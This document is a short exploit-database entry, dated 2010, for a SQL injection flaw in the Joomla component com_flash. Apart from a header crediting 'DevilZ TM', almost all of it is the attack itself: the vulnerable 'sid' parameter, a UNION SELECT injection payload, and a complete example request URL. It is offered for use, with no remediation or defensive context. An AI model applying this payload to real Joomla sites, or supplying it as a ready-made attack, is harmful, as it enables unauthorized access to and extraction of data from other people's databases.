Joomla Component com_flash SQL Injection Vulnerability

2010-03-23
ID: 11409
CVE: None
Download vulnerable application: None
[~]######################################### InformatioN #############################################[~]
   [~] Title     : 
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
   [~]#########################################   ExploiT   #############################################[~]
   [~] Vulnerable File :
   http://127.0.0.1/index.php?option=com_flash&sid=[SQL]
   [~] ExploiT         :
   -1+UNION+SELECT+1,2,3,4,5,6--
   [~] Example         :
   http://127.0.0.1/index.php?option=com_flash&sid=-1+UNION+SELECT+1,2,3,4,5,6--
1-4-2 (www02)